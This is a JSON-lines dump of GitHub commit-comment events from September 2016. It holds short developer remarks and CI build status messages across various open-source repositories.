{"id":"4506410782","type":"CommitCommentEvent","actor":{"login":"aleksa000777"},"repo":{"name":"aleksa000777/fbpage"},"payload":{"comment":{"id":18874705,"position":12,"line":12,"path":"index.html","commit_id":"7b2d369dfa28c27b611d48a0150fe463fbeed439","created_at":"2016-09-02T03:37:35Z","updated_at":"2016-09-02T03:37:35Z","body":"'screen' ?"}},"created_at":"2016-09-02T03:37:35Z"}
{"id":"4506411981","type":"CommitCommentEvent","actor":{"login":"borring"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18874707,"position":null,"line":null,"path":null,"commit_id":"af161dcfb88f2a6886f9e0a7fbfe24cd58c3f658","created_at":"2016-09-02T03:38:06Z","updated_at":"2016-09-02T03:38:06Z","body":"@justinmk Ahh I see.\r\n\r\nThere's no technical reason. I just have a script that pulls neovim, builds and installs it. One day, I tried to look through the nvim documentation with `:h` and saw that there were no help files. I then realized that the latest commit on the doc makefile broke it.\r\n\r\nThanks for the quick response."}},"created_at":"2016-09-02T03:38:06Z"}
{"id":"4506412573","type":"CommitCommentEvent","actor":{"login":"pashariger"},"repo":{"name":"aleksa000777/fbpage"},"payload":{"comment":{"id":18874709,"position":12,"line":12,"path":"index.html","commit_id":"7b2d369dfa28c27b611d48a0150fe463fbeed439","created_at":"2016-09-02T03:38:20Z","updated_at":"2016-09-02T03:38:20Z","body":"nah its all good\r\n"}},"created_at":"2016-09-02T03:38:20Z"}
{"id":"4506415250","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874711,"position":null,"line":null,"path":null,"commit_id":"80d79db416dbe39ad2b46ece8d2fb8d1ce22102c","created_at":"2016-09-02T03:39:31Z","updated_at":"2016-09-02T03:39:31Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 8](http://teamcity.otenv.com/viewLog.html?buildId=5155497&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T03:39:31Z"}
{"id":"4506415339","type":"CommitCommentEvent","actor":{"login":"tonytheodore"},"repo":{"name":"mxe/mxe"},"payload":{"comment":{"id":18874713,"position":null,"line":null,"path":null,"commit_id":"3d44ee628ff5cdd1aa91ef6bf0bff86ee1e69420","created_at":"2016-09-02T03:39:34Z","updated_at":"2016-09-02T03:39:34Z","body":"This seems to have re-created the `gh-pages` branch? It was removed in #1500 #1503.\r\n\r\nhttps://github.com/mxe/mxe/commits/gh-pages"}},"created_at":"2016-09-02T03:39:34Z"}
{"id":"4506415779","type":"CommitCommentEvent","actor":{"login":"elizachen"},"repo":{"name":"elizachen/elizachen.github.io"},"payload":{"comment":{"id":18874714,"position":null,"line":null,"path":null,"commit_id":"8c307e54307adea1691389b1756fe34563841466","created_at":"2016-09-02T03:39:45Z","updated_at":"2016-09-02T03:39:45Z","body":"Use Markdown to fine-tune the Hello-world page."}},"created_at":"2016-09-02T03:39:45Z"}
{"id":"4506416700","type":"CommitCommentEvent","actor":{"login":"roderickhsiao"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":18874716,"position":null,"line":null,"path":null,"commit_id":"1d0fc67459955564d0455b56a9cc228aca01df2d","created_at":"2016-09-02T03:40:09Z","updated_at":"2016-09-02T03:40:09Z","body":"can we get a new package version for this change?"}},"created_at":"2016-09-02T03:40:09Z"}
{"id":"4506417216","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874717,"position":null,"line":null,"path":null,"commit_id":"80d79db416dbe39ad2b46ece8d2fb8d1ce22102c","created_at":"2016-09-02T03:40:20Z","updated_at":"2016-09-02T03:40:20Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 8](http://teamcity.otenv.com/viewLog.html?buildId=5155497&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Exit code 2 Build time: 00:00:48"}},"created_at":"2016-09-02T03:40:20Z"}
{"id":"4506417831","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18874718,"position":null,"line":null,"path":null,"commit_id":"7eb91c6290cf6f6b0d84c8e8a55d92d6fc650549","created_at":"2016-09-02T03:40:36Z","updated_at":"2016-09-02T03:40:36Z","body":"FFMpeg documentation says this on the [topic](https://trac.ffmpeg.org/wiki/Encode/HighQualityAudio)\r\n\r\n> Transcoding from a lossy format like MP3, AAC, Vorbis, Opus, WMA, etc. to the same or different lossy format might degrade the audio quality even if the bitrate stays the same (or higher).\r\n\r\n@SubJunk Looks like historically it has been inaccurate. So it's about time it changed.\r\n\r\n"}},"created_at":"2016-09-02T03:40:36Z"}
{"id":"4506419342","type":"CommitCommentEvent","actor":{"login":"CheckYourScreen"},"repo":{"name":"SarthakNarang/android_kernel_onyx"},"payload":{"comment":{"id":18874722,"position":47,"line":3574,"path":"net/ipv4/tcp_input.c","commit_id":"30dd8d9a625ffaa9dc8ce0a42463518d9420dbe3","created_at":"2016-09-02T03:41:16Z","updated_at":"2016-09-02T03:41:16Z","body":"Sarthak being derpking? :P\r\nOur 3.4 kernel doesnt need this full commit, some part of tcp acks are present in tree which will overwrite those you defined here"}},"created_at":"2016-09-02T03:41:16Z"}
{"id":"4506424814","type":"CommitCommentEvent","actor":{"login":"MedyG"},"repo":{"name":"MedyG/werewolfGame"},"payload":{"comment":{"id":18874735,"position":null,"line":null,"path":null,"commit_id":"338e780188272fb66ae14f532869731f508a86b8","created_at":"2016-09-02T03:43:28Z","updated_at":"2016-09-02T03:43:28Z","body":"熟悉的测试姿势"}},"created_at":"2016-09-02T03:43:28Z"}
{"id":"4506429353","type":"CommitCommentEvent","actor":{"login":"pangfumin"},"repo":{"name":"pangfumin/ORB_SLAM"},"payload":{"comment":{"id":18874741,"position":null,"line":null,"path":null,"commit_id":"9a57c21b003d9f79ba395366c5d4ab8dccc78595","created_at":"2016-09-02T03:45:20Z","updated_at":"2016-09-02T03:45:20Z","body":"add a geometry_msgs::TransformStamped publisher to cooperate with MSF"}},"created_at":"2016-09-02T03:45:20Z"}
{"id":"4506430324","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874742,"position":null,"line":null,"path":null,"commit_id":"08e7b68ed73eb3d7ef6f1dc1a3182ff50685006f","created_at":"2016-09-02T03:45:47Z","updated_at":"2016-09-02T03:45:47Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 9](http://teamcity.otenv.com/viewLog.html?buildId=5155509&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T03:45:47Z"}
{"id":"4506432823","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874745,"position":null,"line":null,"path":null,"commit_id":"08e7b68ed73eb3d7ef6f1dc1a3182ff50685006f","created_at":"2016-09-02T03:46:52Z","updated_at":"2016-09-02T03:46:52Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 9](http://teamcity.otenv.com/viewLog.html?buildId=5155509&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 5 Build time: 00:01:05"}},"created_at":"2016-09-02T03:46:52Z"}
{"id":"4506436807","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874750,"position":null,"line":null,"path":null,"commit_id":"c5f98738f4d752ef0a6b7759e339f79f79863692","created_at":"2016-09-02T03:48:40Z","updated_at":"2016-09-02T03:48:40Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 10](http://teamcity.otenv.com/viewLog.html?buildId=5155521&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T03:48:40Z"}
{"id":"4506437215","type":"CommitCommentEvent","actor":{"login":"jerry10004"},"repo":{"name":"jerry10004/project1"},"payload":{"comment":{"id":18874751,"position":null,"line":null,"path":null,"commit_id":"117519746221b4fc1863132cad6edd07505d1c88","created_at":"2016-09-02T03:48:52Z","updated_at":"2016-09-02T03:48:52Z","body":"Good job!!!"}},"created_at":"2016-09-02T03:48:52Z"}
{"id":"4506437700","type":"CommitCommentEvent","actor":{"login":"sirinyaanupong"},"repo":{"name":"sirinyaanupong/moph_hdc_api"},"payload":{"comment":{"id":18874752,"position":null,"line":null,"path":null,"commit_id":"ec64528f00d6788fc242ad9763bcffdb441e6c7d","created_at":"2016-09-02T03:49:06Z","updated_at":"2016-09-02T03:49:06Z","body":"Create moph_hdc_api repository"}},"created_at":"2016-09-02T03:49:06Z"}
{"id":"4506439076","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874754,"position":null,"line":null,"path":null,"commit_id":"c5f98738f4d752ef0a6b7759e339f79f79863692","created_at":"2016-09-02T03:49:44Z","updated_at":"2016-09-02T03:49:44Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 10](http://teamcity.otenv.com/viewLog.html?buildId=5155521&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 5 Build time: 00:01:03"}},"created_at":"2016-09-02T03:49:44Z"}
{"id":"4506440556","type":"CommitCommentEvent","actor":{"login":"joewang0519"},"repo":{"name":"joewang0519/hello-world"},"payload":{"comment":{"id":18874757,"position":null,"line":null,"path":null,"commit_id":"336faa0dffddc36f5043d26c1e1ecdc7405df5e2","created_at":"2016-09-02T03:50:24Z","updated_at":"2016-09-02T03:50:24Z","body":"Py"}},"created_at":"2016-09-02T03:50:24Z"}
{"id":"4506441109","type":"CommitCommentEvent","actor":{"login":"chengsoonong"},"repo":{"name":"chengsoonong/crowdastro"},"payload":{"comment":{"id":18874759,"position":null,"line":null,"path":null,"commit_id":"d91dd2b37c44d3cec152e50808cd178c0fc06f86","created_at":"2016-09-02T03:50:38Z","updated_at":"2016-09-02T03:50:38Z","body":"I cannot recall whether you are using \"balanced\" as an option while training Logistic Regression. If not, you should do so."}},"created_at":"2016-09-02T03:50:38Z"}
{"id":"4506441675","type":"CommitCommentEvent","actor":{"login":"krgood"},"repo":{"name":"voyagersearch/SolrTextTagger"},"payload":{"comment":{"id":18874763,"position":null,"line":null,"path":null,"commit_id":"734756a19777ee1e1d098ffab527c375778fd381","created_at":"2016-09-02T03:50:53Z","updated_at":"2016-09-02T03:50:53Z","body":"What does that mean? To Solr? Just curiious\n\nOn Thursday, September 1, 2016, Justin Deoliveira <notifications@github.com>\nwrote:\n\n> I meant to submit this back upstream when I originally wrote but totally\n> fell off my radar :) I am almost certain the change is self contained. I'll\n> put this back on my short term todo list.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/voyagersearch/SolrTextTagger/commit/734756a19777ee1e1d098ffab527c375778fd381#commitcomment-18869805>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADX0N8tmU-dfT7ql0dG-i0SRyQE4-3Q2ks5qly_1gaJpZM4Jy1gx>\n> .\n>\n\n\n-- \nKris Goodfellow\nCOO\nVoyager Search\nMobile: 949-335-2437\n"}},"created_at":"2016-09-02T03:50:53Z"}
{"id":"4506449418","type":"CommitCommentEvent","actor":{"login":"ericek111"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18874775,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-02T03:54:16Z","updated_at":"2016-09-02T03:54:16Z","body":"That'd be great! I was about to improve the logger, but ye, co-work will be appreciated. B-)\r\n\r\nI'm working on X11 fully-featured overlay with windows and stuff. I had nice \"HUD\" rendering and working input capture, but that wasn't very extensible, so I decided to split it to smaller classes. Right now it doesn't even compile and it is a huge mess, but it's on good way. oh, good ol’ Java. :/ gtg 2 bed anyways, it's 6 AM here. :-P"}},"created_at":"2016-09-02T03:54:16Z"}
{"id":"4506450880","type":"CommitCommentEvent","actor":{"login":"hroslo"},"repo":{"name":"hroslo/hello_world"},"payload":{"comment":{"id":18874779,"position":null,"line":null,"path":null,"commit_id":"24a1b8577beaa8a3aef28ba1a1a23818951ee638","created_at":"2016-09-02T03:54:56Z","updated_at":"2016-09-02T03:54:56Z","body":"ll"}},"created_at":"2016-09-02T03:54:56Z"}
{"id":"4506451075","type":"CommitCommentEvent","actor":{"login":"fauxparse"},"repo":{"name":"fauxparse/nzif"},"payload":{"comment":{"id":18874780,"position":null,"line":null,"path":null,"commit_id":"d5b5f0f4430502742295b6a1f42d644f4408fb79","created_at":"2016-09-02T03:55:01Z","updated_at":"2016-09-02T03:55:01Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vviXAXL0&#x2F;16-show-payment-details-for-internet-banking-payments\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Show payment details for Internet Banking payments</a>"}},"created_at":"2016-09-02T03:55:01Z"}
{"id":"4506452281","type":"CommitCommentEvent","actor":{"login":"DaniilZhavner"},"repo":{"name":"PurrWeb/upwork-user-agreement"},"payload":{"comment":{"id":18874784,"position":null,"line":null,"path":null,"commit_id":"aafaa4cf4db8a3300519f5d8f5e9cbf0ede6b1dd","created_at":"2016-09-02T03:55:32Z","updated_at":"2016-09-02T03:55:32Z","body":"done"}},"created_at":"2016-09-02T03:55:32Z"}
{"id":"4506452603","type":"CommitCommentEvent","actor":{"login":"dsmiley"},"repo":{"name":"voyagersearch/SolrTextTagger"},"payload":{"comment":{"id":18874785,"position":null,"line":null,"path":null,"commit_id":"734756a19777ee1e1d098ffab527c375778fd381","created_at":"2016-09-02T03:55:40Z","updated_at":"2016-09-02T03:55:40Z","body":"This here is a fork of the OpenSextant SolrTextTagger.  Hopefully there is actually no need for the fork but I'm not familiar with changes here except this one (multiple filter queries) in particular.  We're not talking about contributing to the Apache Solr project.  I am not sure if that makes sense or not... perhaps if it did more things like the features I created issues for today then maybe."}},"created_at":"2016-09-02T03:55:40Z"}
{"id":"4506453257","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18874786,"position":null,"line":null,"path":null,"commit_id":"22c92040738f70ca6372d27663d8cb6bb75ac12f","created_at":"2016-09-02T03:55:56Z","updated_at":"2016-09-02T03:55:56Z","body":"Related to: backdrop/backdrop-issues#2120 "}},"created_at":"2016-09-02T03:55:56Z"}
{"id":"4506454342","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18874791,"position":null,"line":null,"path":null,"commit_id":"cd94c996877b798fe0b3b74b433c4bfecfabc076","created_at":"2016-09-02T03:56:23Z","updated_at":"2016-09-02T03:56:23Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-02T03:56:23Z"}
{"id":"4506454557","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18874792,"position":null,"line":null,"path":null,"commit_id":"bd05a01464aeec771e5d59b5073c39759096175c","created_at":"2016-09-02T03:56:30Z","updated_at":"2016-09-02T03:56:30Z","body":"Related to: backdrop/backdrop-issues#2120 "}},"created_at":"2016-09-02T03:56:30Z"}
{"id":"4506457199","type":"CommitCommentEvent","actor":{"login":"pjlsergeant"},"repo":{"name":"pjlsergeant/test-bdd-cucumber-perl"},"payload":{"comment":{"id":18874797,"position":null,"line":null,"path":null,"commit_id":"061d26609a75b87462a84ec87c83b870bc388bb9","created_at":"2016-09-02T03:57:38Z","updated_at":"2016-09-02T03:57:38Z","body":"That's true. I'll see about fixing that.\n\nOn Friday, 2 September 2016, Yves Lavoie <notifications@github.com> wrote:\n\n> It recognize the syntax: prove --source Feature --feature-option\n> 'tags=~@wip' -j 4 test.feature but doesn't honour the bypass for the wip\n> tag and tries to prove it.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pjlsergeant/test-bdd-cucumber-perl/commit/061d26609a75b87462a84ec87c83b870bc388bb9#commitcomment-18874580>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AABgssaayAkqQYI5tv2u_KC8-wEKb7Bfks5ql5OrgaJpZM4JyOv1>\n> .\n>\n"}},"created_at":"2016-09-02T03:57:38Z"}
{"id":"4506459505","type":"CommitCommentEvent","actor":{"login":"pullmoll"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":18874802,"position":null,"line":null,"path":null,"commit_id":"2f9a59ff2924f3079cd0b6995fb34979cf8b35b5","created_at":"2016-09-02T03:58:46Z","updated_at":"2016-09-02T03:58:46Z","body":"I did not try if (some of) the non QMAKE_ prefixed flags can be removed."}},"created_at":"2016-09-02T03:58:46Z"}
{"id":"4506469554","type":"CommitCommentEvent","actor":{"login":"thomased"},"repo":{"name":"rmaia/pavo"},"payload":{"comment":{"id":18874813,"position":null,"line":null,"path":null,"commit_id":"8309625a4215abd3b9efb2fcdb8176e57b2a8018","created_at":"2016-09-02T04:02:52Z","updated_at":"2016-09-02T04:02:52Z","body":"Yeah this was a muscle-memory accident, meant to commit to another repo..."}},"created_at":"2016-09-02T04:02:52Z"}
{"id":"4506473016","type":"CommitCommentEvent","actor":{"login":"gizmo98"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":18874821,"position":null,"line":null,"path":null,"commit_id":"a5a9efcd49f0c25ddb47a39366c6404eaf87f6e4","created_at":"2016-09-02T04:04:31Z","updated_at":"2016-09-02T04:04:31Z","body":"Thanks!"}},"created_at":"2016-09-02T04:04:31Z"}
{"id":"4506473947","type":"CommitCommentEvent","actor":{"login":"TiberiumPY"},"repo":{"name":"TiberiumPY/puremine"},"payload":{"comment":{"id":18874823,"position":null,"line":null,"path":null,"commit_id":"78780457b019866ba6fc225fcfbcd3831bc2ddbb","created_at":"2016-09-02T04:04:58Z","updated_at":"2016-09-02T04:04:58Z","body":"Our projects are very different, so there's no possibility to merge.\r\nI'm planning to do minecraft pc server, not pocket edition.\r\nBut you can always help :+1: "}},"created_at":"2016-09-02T04:04:58Z"}
{"id":"4506479296","type":"CommitCommentEvent","actor":{"login":"fastdark777"},"repo":{"name":"fastdark777/python"},"payload":{"comment":{"id":18874831,"position":6,"line":5,"path":"dddd.txt","commit_id":"5834153fab6e63466281fdada9f1712f2a2e1987","created_at":"2016-09-02T04:07:19Z","updated_at":"2016-09-02T04:07:19Z","body":"dddd"}},"created_at":"2016-09-02T04:07:19Z"}
{"id":"4506480664","type":"CommitCommentEvent","actor":{"login":"wundrweapon"},"repo":{"name":"CraftSpider/Stronghold2016-340"},"payload":{"comment":{"id":18874832,"position":null,"line":null,"path":null,"commit_id":"06174e3cc46419c8646eff693dcfee03f7db5f65","created_at":"2016-09-02T04:07:54Z","updated_at":"2016-09-02T04:07:54Z","body":"I spoke with rob before supplying the DPad directions. I'm 100% certain that I had them correctly before"}},"created_at":"2016-09-02T04:07:54Z"}
{"id":"4506484037","type":"CommitCommentEvent","actor":{"login":"serotoninphobe"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18874842,"position":null,"line":null,"path":null,"commit_id":"db0212902c12cd40e277e6d9f208a0a43e1ecfeb","created_at":"2016-09-02T04:09:23Z","updated_at":"2016-09-02T04:09:23Z","body":"那就是裁出来的正面图，存为这个coffin.png对吧？"}},"created_at":"2016-09-02T04:09:23Z"}
{"id":"4506484254","type":"CommitCommentEvent","actor":{"login":"DaniilZhavner"},"repo":{"name":"PurrWeb/upwork-user-agreement"},"payload":{"comment":{"id":18874843,"position":null,"line":null,"path":null,"commit_id":"423b652ace2efcbae7d83a188226e0f7ebfe2723","created_at":"2016-09-02T04:09:29Z","updated_at":"2016-09-02T04:09:29Z","body":"done"}},"created_at":"2016-09-02T04:09:29Z"}
{"id":"4506484953","type":"CommitCommentEvent","actor":{"login":"googolhkl1"},"repo":{"name":"googolhkl1/tutorial"},"payload":{"comment":{"id":18874844,"position":null,"line":null,"path":null,"commit_id":"42b46fd54e989517b3e0732f41f250541d0ea7f6","created_at":"2016-09-02T04:09:45Z","updated_at":"2016-09-02T04:09:45Z","body":"첫 커밋?"}},"created_at":"2016-09-02T04:09:45Z"}
{"id":"4506489284","type":"CommitCommentEvent","actor":{"login":"FagnerMartinsBrack"},"repo":{"name":"js-cookie/js-cookie"},"payload":{"comment":{"id":18874847,"position":null,"line":null,"path":null,"commit_id":"337419f7366264c2c9bc34ec6f69d9fd434ceb35","created_at":"2016-09-02T04:11:39Z","updated_at":"2016-09-02T04:11:39Z","body":"I had to revert this, see https://github.com/js-cookie/js-cookie/commit/3d47ad878256bf6457a88ebc72738558e8eaa07f"}},"created_at":"2016-09-02T04:11:39Z"}
{"id":"4506490904","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":18874849,"position":null,"line":null,"path":null,"commit_id":"1d0fc67459955564d0455b56a9cc228aca01df2d","created_at":"2016-09-02T04:12:22Z","updated_at":"2016-09-02T04:12:22Z","body":"Why just for this one alone?"}},"created_at":"2016-09-02T04:12:22Z"}
{"id":"4506492031","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874851,"position":null,"line":null,"path":null,"commit_id":"7bf3bdb9b1f783191651d03a4337741821df1a78","created_at":"2016-09-02T04:12:52Z","updated_at":"2016-09-02T04:12:52Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 11](http://teamcity.otenv.com/viewLog.html?buildId=5155907&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T04:12:52Z"}
{"id":"4506492154","type":"CommitCommentEvent","actor":{"login":"googolhkl1"},"repo":{"name":"googolhkl1/tutorial"},"payload":{"comment":{"id":18874852,"position":4,"line":6,"path":"test.c","commit_id":"a5d31a5ae9d77077f294ac123e651333f521781b","created_at":"2016-09-02T04:12:55Z","updated_at":"2016-09-02T04:12:55Z","body":"왜 추가했어?\r\n"}},"created_at":"2016-09-02T04:12:55Z"}
{"id":"4506492802","type":"CommitCommentEvent","actor":{"login":"FagnerMartinsBrack"},"repo":{"name":"js-cookie/js-cookie"},"payload":{"comment":{"id":18874855,"position":null,"line":null,"path":null,"commit_id":"3d47ad878256bf6457a88ebc72738558e8eaa07f","created_at":"2016-09-02T04:13:13Z","updated_at":"2016-09-02T04:13:13Z","body":"Root Cause: https://github.com/js-cookie/js-cookie/pull/216"}},"created_at":"2016-09-02T04:13:13Z"}
{"id":"4506492969","type":"CommitCommentEvent","actor":{"login":"googolhkl1"},"repo":{"name":"googolhkl1/tutorial"},"payload":{"comment":{"id":18874856,"position":4,"line":6,"path":"test.c","commit_id":"a5d31a5ae9d77077f294ac123e651333f521781b","created_at":"2016-09-02T04:13:19Z","updated_at":"2016-09-02T04:13:19Z","body":"그냥 테스트용\r\n"}},"created_at":"2016-09-02T04:13:19Z"}
{"id":"4506494321","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874860,"position":null,"line":null,"path":null,"commit_id":"7bf3bdb9b1f783191651d03a4337741821df1a78","created_at":"2016-09-02T04:13:55Z","updated_at":"2016-09-02T04:13:55Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 11](http://teamcity.otenv.com/viewLog.html?buildId=5155907&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 5, ignored: 3 Build time: 00:01:04"}},"created_at":"2016-09-02T04:13:55Z"}
{"id":"4506494370","type":"CommitCommentEvent","actor":{"login":"googolhkl1"},"repo":{"name":"googolhkl1/tutorial"},"payload":{"comment":{"id":18874861,"position":4,"line":6,"path":"test.c","commit_id":"a5d31a5ae9d77077f294ac123e651333f521781b","created_at":"2016-09-02T04:13:57Z","updated_at":"2016-09-02T04:13:57Z","body":"이거 왜 추가 한거야?\r\n"}},"created_at":"2016-09-02T04:13:57Z"}
{"id":"4506494767","type":"CommitCommentEvent","actor":{"login":"googolhkl1"},"repo":{"name":"googolhkl1/tutorial"},"payload":{"comment":{"id":18874862,"position":4,"line":6,"path":"test.c","commit_id":"a5d31a5ae9d77077f294ac123e651333f521781b","created_at":"2016-09-02T04:14:08Z","updated_at":"2016-09-02T04:14:08Z","body":"내 마음 ㅅㄱ"}},"created_at":"2016-09-02T04:14:08Z"}
{"id":"4506497341","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18874867,"position":null,"line":null,"path":null,"commit_id":"4bc1e51415c0fd2f78ffc2853012f0a74678cbce","created_at":"2016-09-02T04:15:23Z","updated_at":"2016-09-02T04:15:23Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-4bc1e51415c0fd2f78ffc2853012f0a74678cbce-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T04:15:23Z"}
{"id":"4506499345","type":"CommitCommentEvent","actor":{"login":"Froznar"},"repo":{"name":"Froznar/IS2---Practica01Lab"},"payload":{"comment":{"id":18874872,"position":null,"line":null,"path":null,"commit_id":"7cfb2893c8b7637e582ec7a4e2366ddbfdee2ffb","created_at":"2016-09-02T04:16:25Z","updated_at":"2016-09-02T04:16:25Z","body":"No entiendo Jonathan, porque mis cambios aparecen como pull-request tuyo?"}},"created_at":"2016-09-02T04:16:25Z"}
{"id":"4506503239","type":"CommitCommentEvent","actor":{"login":"slackner"},"repo":{"name":"alexhenrie/wine"},"payload":{"comment":{"id":18874885,"position":24,"line":187,"path":"dlls/shell32/shell32_main.h","commit_id":"e943556d028cf3baae8dec6f7082808da472b1d2","created_at":"2016-09-02T04:18:19Z","updated_at":"2016-09-02T04:18:19Z","body":"I think you should only move the function which is actually needed, and put this change into the following patch. This would also be a nice opportunity to get rid of the ugly LP* types and to use strlenW() / strcpyW() instead of lstr* functions. You'll find various examples of cleaned up strdupW() functions when you search through the Wine source tree."}},"created_at":"2016-09-02T04:18:19Z"}
{"id":"4506503908","type":"CommitCommentEvent","actor":{"login":"vujita"},"repo":{"name":"vujita/twitter-viewer"},"payload":{"comment":{"id":18874888,"position":null,"line":null,"path":null,"commit_id":"c5ec02a3f91384f0179edf57ae7b0a0046ba7ca3","created_at":"2016-09-02T04:18:38Z","updated_at":"2016-09-02T04:18:38Z","body":"Good find, thanks"}},"created_at":"2016-09-02T04:18:38Z"}
{"id":"4506505559","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"regalstreak/skadoosh"},"payload":{"comment":{"id":18874893,"position":null,"line":null,"path":null,"commit_id":"b02b7cac9cefb8462ffd1224307fc616ac1f902c","created_at":"2016-09-02T04:19:24Z","updated_at":"2016-09-02T04:19:24Z","body":"@regalstreak update the README please"}},"created_at":"2016-09-02T04:19:24Z"}
{"id":"4506506792","type":"CommitCommentEvent","actor":{"login":"MatthewJA"},"repo":{"name":"chengsoonong/crowdastro"},"payload":{"comment":{"id":18874897,"position":null,"line":null,"path":null,"commit_id":"d91dd2b37c44d3cec152e50808cd178c0fc06f86","created_at":"2016-09-02T04:19:59Z","updated_at":"2016-09-02T04:19:59Z","body":"I am using balanced."}},"created_at":"2016-09-02T04:19:59Z"}
